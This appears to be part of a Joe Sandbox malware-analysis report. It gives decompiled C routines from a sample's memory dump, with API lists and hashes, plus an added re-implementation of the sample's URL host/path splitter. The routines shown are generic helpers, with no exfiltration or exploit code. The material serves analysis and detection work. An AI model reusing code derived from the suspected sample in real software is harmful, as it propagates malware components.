            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: memcpy$AllocateHeaplstrlen
            • String ID:
            • API String ID: 1819133394-0
            • Opcode ID: 09ab169541ea4cf7d5bac85b254b2be8f0b65ebba83ecf9278128b61e2b05953
            • Instruction ID: e3af93278f37b725d2725226e1018e1f79fde2742fd79e1f0dbe247881680b52
            • Opcode Fuzzy Hash: 09ab169541ea4cf7d5bac85b254b2be8f0b65ebba83ecf9278128b61e2b05953
            • Instruction Fuzzy Hash: 3F110A72A00215AFD7108A6ADD84DAE7BBEEBC8360B154375F504DB241E7759E008790
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 64%
            			E047E23C4(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
            				intOrPtr _v36;
            				intOrPtr _v44;
            				intOrPtr _v48;
            				intOrPtr _v52;
            				void _v60;
            				char _v64;
            				intOrPtr _t18;
            				intOrPtr _t19;
            				intOrPtr _t26;
            				intOrPtr _t27;
            				long _t28;
            
            				_t27 = __edi;
            				_t26 = _a8;
            				_t28 = E047E3A63(_a4, _t26, __edi);
            				if(_t28 != 0) {
            					memset( &_v60, 0, 0x38);
            					_t18 =  *0x47ea348; // 0xc3d5a8
            					_t28 = 0;
            					_v64 = 0x3c;
            					if(_a12 == 0) {
            						_t7 = _t18 + 0x47eb50c; // 0x70006f
            						_t19 = _t7;
            					} else {
            						_t6 = _t18 + 0x47eb8d8; // 0x750072
            						_t19 = _t6;
            					}
            					_v52 = _t19;
            					_push(_t28);
            					_v48 = _a4;
            					_v44 = _t26;
            					_v36 = _t27;
            					E047E5B56();
            					_push( &_v64);
            					if( *0x47ea100() == 0) {
            						_t28 = GetLastError();
            					}
            					_push(1);
            					E047E5B56();
            				}
            				return _t28;
            			}

            0x047e23c4
            0x047e23cb
            0x047e23d9
            0x047e23dd
            0x047e23e7
            0x047e23ec
            0x047e23f1
            0x047e23f6
            0x047e2400
            0x047e240a
            0x047e240a
            0x047e2402
            0x047e2402
            0x047e2402
            0x047e2402
            0x047e2410
            0x047e2416
            0x047e2417
            0x047e241a
            0x047e241d
            0x047e2420
            0x047e2428
            0x047e2431
            0x047e2439
            0x047e2439
            0x047e243b
            0x047e243d
            0x047e243d
            0x047e2447

            APIs
              • Part of subcall function 047E3A63: SysAllocString.OLEAUT32(00000000), ref: 047E3ABD
              • Part of subcall function 047E3A63: SysAllocString.OLEAUT32(0070006F), ref: 047E3AD1
              • Part of subcall function 047E3A63: SysAllocString.OLEAUT32(00000000), ref: 047E3AE3
            • memset.NTDLL ref: 047E23E7
            • GetLastError.KERNEL32 ref: 047E2433
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: AllocString$ErrorLastmemset
            • String ID: <$@MetNet
            • API String ID: 3736384471-3263418992
            • Opcode ID: 8f82f7763146933a81b725447da5b3c9d34c660da03e376f6ef2d100f7a7215e
            • Instruction ID: a92264b165f986bca8ad9ec785094cc3059eeb517eed1a7e45ef59aa701c759e
            • Opcode Fuzzy Hash: 8f82f7763146933a81b725447da5b3c9d34c660da03e376f6ef2d100f7a7215e
            • Instruction Fuzzy Hash: DF014471900218ABD711DFA6D884EDD7BBCEB0C744F408266F904E7341E774AD408BD1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E047E7843(void* __esi) {
            				struct _SECURITY_ATTRIBUTES* _v4;
            				void* _t8;
            				void* _t10;
            
            				_v4 = 0;
            				memset(__esi, 0, 0x38);
            				_t8 = CreateEventA(0, 1, 0, 0);
            				 *(__esi + 0x1c) = _t8;
            				if(_t8 != 0) {
            					_t10 = CreateEventA(0, 1, 1, 0);
            					 *(__esi + 0x20) = _t10;
            					if(_t10 == 0) {
            						CloseHandle( *(__esi + 0x1c));
            					} else {
            						_v4 = 1;
            					}
            				}
            				return _v4;
            			}

            0x047e784d
            0x047e7851
            0x047e7866
            0x047e7868
            0x047e786d
            0x047e7873
            0x047e7875
            0x047e787a
            0x047e7885
            0x047e787c
            0x047e787c
            0x047e787c
            0x047e787a
            0x047e7893

            APIs
            • memset.NTDLL ref: 047E7851
            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,746981D0,00000000,00000000), ref: 047E7866
            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 047E7873
            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,047E3F34,00000000,?), ref: 047E7885
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: CreateEvent$CloseHandlememset
            • String ID:
            • API String ID: 2812548120-0
            • Opcode ID: beb325a873c7877eee2f607794f0102a84fed5e02b991ce6fd95e1eae83fad7e
            • Instruction ID: 0e2798fad843167157c9c7e2ad7ef5cfb2de6faa7fb5da19d5bdd2fce1499468
            • Opcode Fuzzy Hash: beb325a873c7877eee2f607794f0102a84fed5e02b991ce6fd95e1eae83fad7e
            • Instruction Fuzzy Hash: 2BF054F11043087FE3145F27DCC4C77BB9CEB991987114E3EF14295611D675AC058A60
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E047E3230() {
            				void* _t1;
            				intOrPtr _t5;
            				void* _t6;
            				void* _t7;
            				void* _t11;
            
            				_t1 =  *0x47ea30c; // 0x1ac
            				if(_t1 == 0) {
            					L8:
            					return 0;
            				}
            				SetEvent(_t1);
            				_t11 = 0x7fffffff;
            				while(1) {
            					SleepEx(0x64, 1);
            					_t5 =  *0x47ea35c; // 0x0
            					if(_t5 == 0) {
            						break;
            					}
            					_t11 = _t11 - 0x64;
            					if(_t11 > 0) {
            						continue;
            					}
            					break;
            				}
            				_t6 =  *0x47ea30c; // 0x1ac
            				if(_t6 != 0) {
            					CloseHandle(_t6);
            				}
            				_t7 =  *0x47ea2d8; // 0x5030000
            				if(_t7 != 0) {
            					HeapDestroy(_t7);
            				}
            				goto L8;
            			}

            0x047e3230
            0x047e3237
            0x047e3281
            0x047e3283
            0x047e3283
            0x047e323b
            0x047e3241
            0x047e3246
            0x047e324a
            0x047e3250
            0x047e3257
            0x00000000
            0x00000000
            0x047e3259
            0x047e325e
            0x00000000
            0x00000000
            0x00000000
            0x047e325e
            0x047e3260
            0x047e3268
            0x047e326b
            0x047e326b
            0x047e3271
            0x047e3278
            0x047e327b
            0x047e327b
            0x00000000

            APIs
            • SetEvent.KERNEL32(000001AC,00000001,047E109A), ref: 047E323B
            • SleepEx.KERNEL32(00000064,00000001), ref: 047E324A
            • CloseHandle.KERNEL32(000001AC), ref: 047E326B
            • HeapDestroy.KERNEL32(05030000), ref: 047E327B
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: CloseDestroyEventHandleHeapSleep
            • String ID:
            • API String ID: 4109453060-0
            • Opcode ID: 8b7700602304bc1bac64543859b4853c27c0492f108fbb69d657ccb99e91bcaf
            • Instruction ID: 0ad87824b87b85c6dfaf736fa337f5049638fd4c5c24fe75a60f00d9cdd5beb9
            • Opcode Fuzzy Hash: 8b7700602304bc1bac64543859b4853c27c0492f108fbb69d657ccb99e91bcaf
            • Instruction Fuzzy Hash: 75F0ACB6B0121297DB109A77DA88AE63BECEB0C761B458754BD41EF3C2DB28EC409560
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 58%
            			E047E2058(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
            				// Splits the string at _a4 into a host buffer (*_a8) and a path buffer (*_a12).
            				// Returns 1 on success, 0 if either allocation fails. Decompiler output; comments added.
            				intOrPtr* _v8;
            				void* _t17;
            				intOrPtr* _t22;
            				void* _t27;
            				char* _t30;
            				void* _t33;
            				void* _t34;
            				void* _t36;
            				void* _t37;
            				void* _t39;
            				int _t42;
            
            				_t17 = __eax;
            				_t37 = 0;
            				__imp__(_a4, _t33, _t36, _t27, __ecx); // lstrlen(_a4), ref 047E2064
            				_t2 = _t17 + 1; // 0x1
            				_t28 = _t2;
            				_t34 = E047E33DC(_t2); // host buffer, lstrlen+1 bytes (RtlAllocateHeap)
            				if(_t34 != 0) {
            					_t30 = E047E33DC(_t28); // path buffer, same size
            					if(_t30 == 0) {
            						E047E61DA(_t34); // release host buffer on failure
            					} else {
            						_t39 = _a4;
            						_t22 = E047E7AE9(_t39); // first '/' or '?' (StrChrA 0x2F / 0x3F)
            						_v8 = _t22;
            						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
            							_a4 = _t39;
            						} else {
            							// separator is doubled ("//" after a scheme): skip it and search again
            							_t26 = _t22 + 2;
            							_a4 = _t22 + 2;
            							_t22 = E047E7AE9(_t26);
            							_v8 = _t22;
            						}
            						if(_t22 == 0) {
            							__imp__(_t34, _a4); // lstrcpy: whole remainder is the host, ref 047E20DE
            							 *_t30 = 0x2f; // path defaults to "/"
            							 *((char*)(_t30 + 1)) = 0;
            						} else {
            							_t42 = _t22 - _a4; // host length up to the separator
            							memcpy(_t34, _a4, _t42);
            							 *((char*)(_t34 + _t42)) = 0;
            							__imp__(_t30, _v8); // lstrcpy: path keeps the separator, ref 047E20D2
            						}
            						 *_a8 = _t34;
            						_t37 = 1;
            						 *_a12 = _t30;
            					}
            				}
            				return _t37;
            			}

            Instruction addresses (one per line of the C code above): 0x047e2058 0x047e2062 0x047e2064 0x047e206a 0x047e206a 0x047e2073 0x047e2077 0x047e2083 0x047e2087 0x047e20fb 0x047e2089 0x047e2089 0x047e208d 0x047e2092 0x047e2097 0x047e20b1 0x047e20a0 0x047e20a0 0x047e20a4 0x047e20a7 0x047e20ac 0x047e20ac 0x047e20b6 0x047e20de 0x047e20e4 0x047e20e7 0x047e20b8 0x047e20ba 0x047e20c2 0x047e20cd 0x047e20d2 0x047e20d2 0x047e20ee 0x047e20f5 0x047e20f6 0x047e20f6 0x047e2087 0x047e2106

            APIs
            • lstrlen.KERNEL32(00000000,00000008,?,74654D40,?,?,047E51F7,?,?,?,?,00000102,047E21E7,?,?,746981D0), ref: 047E2064
              • Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8
              • Part of subcall function 047E7AE9: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,047E2092,00000000,00000001,00000001,?,?,047E51F7,?,?,?,?,00000102), ref: 047E7AF7
              • Part of subcall function 047E7AE9: StrChrA.SHLWAPI(?,0000003F,?,?,047E51F7,?,?,?,?,00000102,047E21E7,?,?,746981D0,00000000), ref: 047E7B01
            • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,047E51F7,?,?,?,?,00000102,047E21E7,?), ref: 047E20C2
            • lstrcpy.KERNEL32(00000000,00000000), ref: 047E20D2
            • lstrcpy.KERNEL32(00000000,00000000), ref: 047E20DE
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
            • String ID:
            • API String ID: 3767559652-0
            • Opcode ID: 4a9c5cd2886e4f81424b2d45f6ad5bd0e815fcca367d7343d4f0a91d2bd9d50a
            • Instruction ID: 3cead67941259d549ef59be3285428dfad3c5ab885e2e5d88805f39b8065b3c4
            • Opcode Fuzzy Hash: 4a9c5cd2886e4f81424b2d45f6ad5bd0e815fcca367d7343d4f0a91d2bd9d50a
            • Instruction Fuzzy Hash: 5721F372100216EBCB129FA6C848ABA7FBCEF09254B148694F9059B302D635EA40C7A1
            Uniqueness

            Uniqueness Score: -1.00%
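            The routine E047E2058 above, with E047E7AE9 as its separator search, splits a URL-like string into a host buffer and a path buffer. The following C program is an added re-implementation of that logic so the decompiled control flow can be checked against concrete inputs; it is not the sample's code and not part of the report. The function names split_url and first_separator, the tie-break when both '/' and '?' occur (earliest wins), and the sample URLs are assumptions and constructed test data.

```c
/* Added example: re-implementation of the host/path split seen in E047E2058.
 * Not the sample's code. Names, tie-break rule and inputs are assumptions. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Mirrors E047E7AE9: StrChrA(s, '/') and StrChrA(s, '?') in the sample.
 * Returns whichever separator occurs first, or NULL if neither is present.
 * The earliest-wins tie-break is an assumption about the decompiled helper. */
static const char *first_separator(const char *s) {
    const char *slash = strchr(s, '/');
    const char *qmark = strchr(s, '?');
    if (slash == NULL) return qmark;
    if (qmark == NULL) return slash;
    return slash < qmark ? slash : qmark;
}

/* Mirrors E047E2058. On success *host and *path receive heap strings the
 * caller frees and the function returns 1; on allocation failure returns 0. */
int split_url(const char *url, char **host, char **path) {
    size_t n = strlen(url) + 1;          /* sample allocates lstrlen+1 for each buffer */
    char *h = malloc(n);
    if (h == NULL) return 0;
    char *p = malloc(n);
    if (p == NULL) { free(h); return 0; }

    const char *start = url;
    const char *sep = first_separator(start);
    /* sample checks sep[0] == sep[1]: a doubled separator such as the "//"
     * after a scheme is skipped and the search restarts after it */
    if (sep != NULL && sep[0] == sep[1]) {
        start = sep + 2;
        sep = first_separator(start);
    }
    if (sep == NULL) {
        strcpy(h, start);                /* whole remainder is the host */
        p[0] = '/';                      /* path defaults to "/" (0x2f, 0x00) */
        p[1] = '\0';
    } else {
        size_t hl = (size_t)(sep - start);
        memcpy(h, start, hl);            /* host up to the separator */
        h[hl] = '\0';
        strcpy(p, sep);                  /* path keeps the '/' or '?' */
    }
    *host = h;
    *path = p;
    return 1;
}

int main(void) {
    /* constructed inputs, not observed in the sample */
    const char *samples[] = { "http://example.test/path?x=1", "example.test", "host?q=1", "//host" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        char *h = NULL, *p = NULL;
        if (split_url(samples[i], &h, &p)) {
            printf("%-30s host=%-14s path=%s\n", samples[i], h, p);
            free(h);
            free(p);
        }
    }
    return 0;
}
```

            Two behaviours worth noting for anyone writing emulation or detection logic around this routine: a string with no separator still yields a path of "/", and a '?' is treated as the end of the host just like '/', so the query string travels with the path buffer.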

            C-Code - Quality: 100%
            			E047E5DE4(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
            				// Concatenates two wide strings into a freshly allocated buffer and returns it
            				// (NULL if the allocation fails). Decompiler output; comments added.
            				void* _v8;
            				void* _t18;
            				int _t25;
            				int _t29;
            				int _t34;
            
            				_t29 = lstrlenW(_a4);
            				_t25 = lstrlenW(_a8);
            				_t18 = E047E33DC(_t25 + _t29 + _t25 + _t29 + 2); // 2*(lenA+lenB)+2 bytes: both strings plus the wide terminator
            				_v8 = _t18;
            				if(_t18 != 0) {
            					_t34 = _t29 + _t29; // byte length of _a4
            					memcpy(_t18, _a4, _t34);
            					_t10 = _t25 + 2; // 0x2
            					memcpy(_v8 + _t34, _a8, _t25 + _t10); // 2*lenB+2 bytes: _a8 including its terminator
            				}
            				return _v8;
            			}

            Instruction addresses (one per line of the C code above): 0x047e5df9 0x047e5dfd 0x047e5e07 0x047e5e0c 0x047e5e11 0x047e5e13 0x047e5e1b 0x047e5e20 0x047e5e2e 0x047e5e33 0x047e5e3d

            APIs
            • lstrlenW.KERNEL32(004F0053,?,74655520,00000008,05429270,?,047E52D0,004F0053,05429270,?,?,?,?,?,?,047E68B6), ref: 047E5DF4
            • lstrlenW.KERNEL32(047E52D0,?,047E52D0,004F0053,05429270,?,?,?,?,?,?,047E68B6), ref: 047E5DFB
              • Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8
            • memcpy.NTDLL(00000000,004F0053,746569A0,?,?,047E52D0,004F0053,05429270,?,?,?,?,?,?,047E68B6), ref: 047E5E1B
            • memcpy.NTDLL(746569A0,047E52D0,00000002,00000000,004F0053,746569A0,?,?,047E52D0,004F0053,05429270), ref: 047E5E2E
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: lstrlenmemcpy$AllocateHeap
            • String ID:
            • API String ID: 2411391700-0
            • Opcode ID: 3445f39cdf57d1eb18604285b1ae0f6d430eb0510e2c4d3dfbf8f0cf2be4acca
            • Instruction ID: 20fd9da3df1830f4887803cf6f41c31171fa48fe9776cb311088cbceae12cc14
            • Opcode Fuzzy Hash: 3445f39cdf57d1eb18604285b1ae0f6d430eb0510e2c4d3dfbf8f0cf2be4acca
            • Instruction Fuzzy Hash: 65F04F7290011DBBDF11DFE9CC48CDE7BADEF082587114162ED04D7201E635EA108BA0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • lstrlen.KERNEL32(05429BF8,00000000,00000000,00000000,047E3EF9,00000000), ref: 047E7573
            • lstrlen.KERNEL32(?), ref: 047E757B
              • Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8
            • lstrcpy.KERNEL32(00000000,05429BF8), ref: 047E758F
            • lstrcat.KERNEL32(00000000,?), ref: 047E759A
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
            • String ID:
            • API String ID: 74227042-0
            • Opcode ID: 638c374d535c7b2aee9e3c2b5b826b7783e3927fcc8cd9af105959e5ac25ae31
            • Instruction ID: 34b01fc7b4db0c77e45140fe8a855fa816009c6bf1dddb56ee590de16562fb08
            • Opcode Fuzzy Hash: 638c374d535c7b2aee9e3c2b5b826b7783e3927fcc8cd9af105959e5ac25ae31
            • Instruction Fuzzy Hash: 1CE09BB35016215B87115BA6AC48CAFB76CFF8D6503044916F700D7200D735DD0187A1
            Uniqueness

            Uniqueness Score: -1.00%